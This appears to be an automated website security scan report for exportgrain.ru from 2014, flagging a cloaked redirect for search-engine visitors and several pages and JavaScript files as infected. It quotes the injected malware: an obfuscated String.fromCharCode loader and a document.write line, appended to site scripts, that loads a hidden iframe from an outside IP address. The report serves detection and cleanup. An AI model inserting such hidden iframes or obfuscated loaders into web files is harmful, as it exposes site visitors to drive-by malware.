Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://exportgrain.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: exportgrain.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 07 Sep 2014 23:54:27 GMT Location: http://tinyurl.com/c2td3xs Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | malicious |
Scanned pages/files
Request | Server response | Status |
http://exportgrain.ru/ | 200 OK Content-Length: 25804 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
| ||
http://exportgrain.ru/media/system/js/caption.js | 200 OK Content-Length: 4375 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,97,106,103,107,33,63,32,101,113,99,118,111,101,111,118,46,100,116,101,98,118,101,70,110,101,110,103,110,117,42,39,106,104,114,98,111,101,40,43,59,14,12,13,11,34,32,33,34,97,106,103,107,47,117,114,100,34,61,33,41,104,117,118,112,59,49,47,105,113,109,102,102,105,100,117,45,115,119,115,116,107,97,47,116,117,48,101,108,106,109,46,113,106,112,40,61,13,11,34,32,33,34,97,106,103,107,47,117,11 Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/templates/exportgrain/js/jquery.js | 200 OK Content-Length: 97255 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,97,106,103,107,33,63,32,101,113,99,118,111,101,111,118,46,100,116,101,98,118,101,70,110,101,110,103,110,117,42,39,106,104,114,98,111,101,40,43,59,14,12,13,11,34,32,33,34,97,106,103,107,47,117,114,100,34,61,33,41,104,117,118,112,59,49,47,105,113,109,102,102,105,100,117,45,115,119,115,116,107,97,47,116,117,48,101,108,106,109,46,113,106,112,40,61,13,11,34,32,33,34,97,106,103,107,47,117,11 Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/templates/exportgrain/js/browser.js | 200 OK Content-Length: 3381 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CBS=function(){var b=navigator.userAgent.toLowerCase(),a=function(a){return-1<b.indexOf(a)},e=navigator.cookieEnabled?"iscookie":"nocookie",d=document.getElementsByTagName("html")[0];c=[!/opera|webtv/i.test(b)&&/msie\s(\d)/.test(b)?"ie ie"+RegExp.$1+(a("trident")&&a("msie 7.0")?" compat":""):a("firefox/2")?"gecko ff2":a("firefox/3")?"gecko ff3":a("firefox/4")?"gecko ff5":a("firefox/5")?"gecko ff5":a("gecko/")?"gecko":/opera(\s|\/)(\d+)/.test(b)?"opera opera"+RegExp.$2:a("k ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<!-- . -->;document.write('<iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"></iframe>'); <!-- . --> Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/templates/exportgrain/js/script.js | 200 OK Content-Length: 3565 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); jQuery(document).ready(function($) { CBS(); $('.contentheading').parent().parent().parent().removeClass('contentpaneopen'); $('#sidebar ul.menu li ul').each(function() { $(this).parent().append('<div class="child"></div>'); $(this).parent().find('div.child').append($(this)) }); $('#sidebar ul.menu li ul li ul').each(function() { $(this).parent().find('div.child').append($(this)) }); $('#jflanguagesele jQuery('#content').height(hs); } }); jQuery(window).load(function($){ var hs = jQuery('#sidebar').height(); var hc = jQuery('#content').height(); if(hs>hc) { jQuery('#content').height(hs); } });;document.write(''); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<!-- . -->;document.write('<iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"></iframe>'); <!-- . --> Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/modules/mod_flashrotator/js_flashrotator/swfobject.js | 200 OK Content-Length: 9347 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,97,106,103,107,33,63,32,101,113,99,118,111,101,111,118,46,100,116,101,98,118,101,70,110,101,110,103,110,117,42,39,106,104,114,98,111,101,40,43,59,14,12,13,11,34,32,33,34,97,106,103,107,47,117,114,100,34,61,33,41,104,117,118,112,59,49,47,105,113,109,102,102,105,100,117,45,115,119,115,116,107,97,47,116,117,48,101,108,106,109,46,113,106,112,40,61,13,11,34,32,33,34,97,106,103,107,47,117,11 Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/ru.html | 200 OK Content-Length: 25769 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
| ||
http://exportgrain.ru/en.html | 200 OK Content-Length: 25808 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
| ||
http://exportgrain.ru/en/kontakti.html | 200 OK Content-Length: 22381 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
| ||
http://exportgrain.ru/ru/kontakti.html | 200 OK Content-Length: 22454 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
| ||
http://exportgrain.ru/ru/ | 200 OK Content-Length: 25717 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
| ||
http://exportgrain.ru/test404page.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://exportgrain.ru/js/jquery/jquery-1.4.4.min.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://exportgrain.ru/js/site_navigation.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://exportgrain.ru/js/ | 404 ÐÐ¾Ð¼Ð¿Ð¾Ð½ÐµÐ½Ñ Ð½Ðµ найден Content-Length: 1844 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exportgrain.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://exportgrain.ru/
Result: exportgrain.ru is not infected or malware details are not published yet.
Result: exportgrain.ru is not infected or malware details are not published yet.